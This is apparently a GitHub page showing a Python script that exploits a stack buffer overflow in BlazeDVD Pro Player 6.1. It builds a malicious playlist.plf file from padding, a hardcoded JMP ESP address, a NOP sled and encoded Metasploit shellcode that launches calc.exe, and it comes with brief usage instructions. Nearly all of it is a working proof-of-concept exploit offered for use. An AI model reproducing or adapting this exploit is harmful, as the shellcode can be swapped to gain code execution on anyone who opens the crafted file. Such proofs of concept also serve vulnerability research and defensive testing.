-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathBlazeDVDProPlayer6.1-LocalStackBufferOverflow.py
32 lines (32 loc) · 1.52 KB
/
BlazeDVDProPlayer6.1-LocalStackBufferOverflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python
#How To Use: ./exploit.py => playlist.plf open BlazeDVD
junk = '\x41' * 260
eip = '\x69\x2D\xB3\x7C' #JMP ESP SHELL32.dll 7CB32D69 // Bad:'\x00\xff\x0a\x0d\x1a'
nop = '\x90' * 50
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
buf = ""
buf += "\xda\xdf\xbd\x74\x2d\xbe\x01\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x31\x6a\x18\x83\xea\xfc\x03\x6a\x60\xcf"
buf += "\x4b\xfd\x60\x8d\xb4\xfe\x70\xf2\x3d\x1b\x41\x32\x59"
buf += "\x6f\xf1\x82\x29\x3d\xfd\x69\x7f\xd6\x76\x1f\xa8\xd9"
buf += "\x3f\xaa\x8e\xd4\xc0\x87\xf3\x77\x42\xda\x27\x58\x7b"
buf += "\x15\x3a\x99\xbc\x48\xb7\xcb\x15\x06\x6a\xfc\x12\x52"
buf += "\xb7\x77\x68\x72\xbf\x64\x38\x75\xee\x3a\x33\x2c\x30"
buf += "\xbc\x90\x44\x79\xa6\xf5\x61\x33\x5d\xcd\x1e\xc2\xb7"
buf += "\x1c\xde\x69\xf6\x91\x2d\x73\x3e\x15\xce\x06\x36\x66"
buf += "\x73\x11\x8d\x15\xaf\x94\x16\xbd\x24\x0e\xf3\x3c\xe8"
buf += "\xc9\x70\x32\x45\x9d\xdf\x56\x58\x72\x54\x62\xd1\x75"
buf += "\xbb\xe3\xa1\x51\x1f\xa8\x72\xfb\x06\x14\xd4\x04\x58"
buf += "\xf7\x89\xa0\x12\x15\xdd\xd8\x78\x73\x20\x6e\x07\x31"
buf += "\x22\x70\x08\x65\x4b\x41\x83\xea\x0c\x5e\x46\x4f\xe2"
buf += "\x14\xcb\xf9\x6b\xf1\x99\xb8\xf1\x02\x74\xfe\x0f\x81"
buf += "\x7d\x7e\xf4\x99\xf7\x7b\xb0\x1d\xeb\xf1\xa9\xcb\x0b"
buf += "\xa6\xca\xd9\x6f\x29\x59\x81\x41\xcc\xd9\x20\x9e"
exploit = junk + eip + nop + buf + nop
f = open("playlist.plf","w")
f.writelines(exploit)
f.close()
print("\nExploit Completed :)\n")